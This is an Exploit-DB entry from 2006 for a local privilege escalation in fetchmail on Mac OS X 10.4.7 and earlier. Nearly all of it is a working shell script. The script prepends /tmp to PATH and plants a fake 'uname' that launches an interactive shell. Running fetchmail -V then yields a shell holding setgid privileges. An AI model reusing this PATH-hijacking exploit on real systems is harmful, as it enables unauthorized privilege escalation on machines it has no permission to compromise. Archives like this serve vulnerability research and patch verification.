Mac OS X <= 10.4.7 - fetchmail Privilege Escalation Exploit

2006-08-01T00:00:00
ID EDB-ID:2108
Type exploitdb
Reporter Kevin Finisterre
Modified 2006-08-01T00:00:00

Description

Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit. Local exploit for osx platform

                                        
                                            #!/bin/sh
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) 
#
# Previously undisclosed local fetchmail issue. This takes setgid=6
#
# http://docs.info.apple.com/article.html?artnum=106704

export PATH=/tmp:$PATH
echo /bin/sh -i &gt; /tmp/uname
chmod +x /tmp/uname
/usr/bin/fetchmail -V

# milw0rm.com [2006-08-01]